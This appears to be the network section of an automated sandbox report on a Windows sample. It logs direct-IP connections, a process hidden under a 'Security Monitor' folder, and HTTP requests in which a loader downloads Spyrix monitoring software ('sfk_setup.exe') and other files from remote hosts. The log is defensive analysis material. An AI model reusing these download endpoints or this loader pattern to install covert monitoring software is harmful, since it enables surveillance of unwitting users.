Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D473D0 recv,send,WSAGetLastError,

67_2_00D473D0

Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404 HTTP/1.1Host: filedn.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108 HTTP/1.1Host: filedn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /loader/link.php?prg_id=sfk HTTP/1.1Host: cdnbaynet.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /download/sfk/sfk_setup.exe HTTP/1.1Host: swtb-download.spyrix-sfk.comUser-Agent: sfk-dst-loader-2.0Accept: /
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cT+9XekNm5bPwLf&MD=3TyOahlY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cT+9XekNm5bPwLf&MD=3TyOahlY HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-93c74fef.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-004f4025.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn.js HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dashboard.spyrix.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Regular-73dcaa51.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal-86d79a8a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button-ca236c00.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input-34212571.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-7e7c447a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
